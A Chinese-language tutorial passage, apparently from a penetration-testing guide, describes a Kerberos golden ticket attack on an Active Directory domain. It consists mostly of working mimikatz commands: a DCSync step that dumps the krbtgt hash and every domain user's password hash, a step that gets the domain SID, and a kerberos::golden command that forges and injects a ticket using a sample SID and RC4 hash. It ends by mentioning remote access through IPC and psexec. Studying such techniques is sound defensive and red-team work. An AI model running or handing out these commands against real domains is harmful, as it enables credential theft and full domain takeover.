### 5.1.2 黄金票据利用
#### 1、导出 krbtgt 密码 hash
“`bash
mimikatz#lsadump::dcsync /domain:adtest.com /user:krbtgt
“`
导出所有域内用户密码 hash 值:
“`bash
mimikatz#lsadump::dcsync /domain:adtest.com /all /csv
“`
#### 2、获取域 SID
在导出 krbtgt 的 hash 的时候已经包含了域 SID,也可以用以下命令来查看域 SID
“`
whoami /all
“`
#### 3、伪造黄金票据
“`bash
mimikatz.exe privilege::debug “kerberos::golden /domain:adtest.com /sid:S-1-5-21- 3418659180-3421952656-1938706522 /target:WIN-9P499QKTLDO.ADTEST.COM /service:cifs /rc4: 6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt”
“`
这里可以不指定 target 和 service
“`bash
kerberos::golden /domain:adtest.com /sid:S-1-5-21-3418659180-3421952656-
1938706522 /rc4:6f0fdf50f2dcee2fed8e2e3eae7e1592 /user:aaa /ptt
“`
使用 klist 查看本地缓存的票据
获得票据后可直接通过 dir 远程访问主机,可以直接使用 ipc 进行连接:
当然也可以使用 psexec 去获得一个 cmdshell:
> 注:普通黄金票据不能跨域使用;TGT 有效时间为 20 分钟;。
请登录后查看评论内容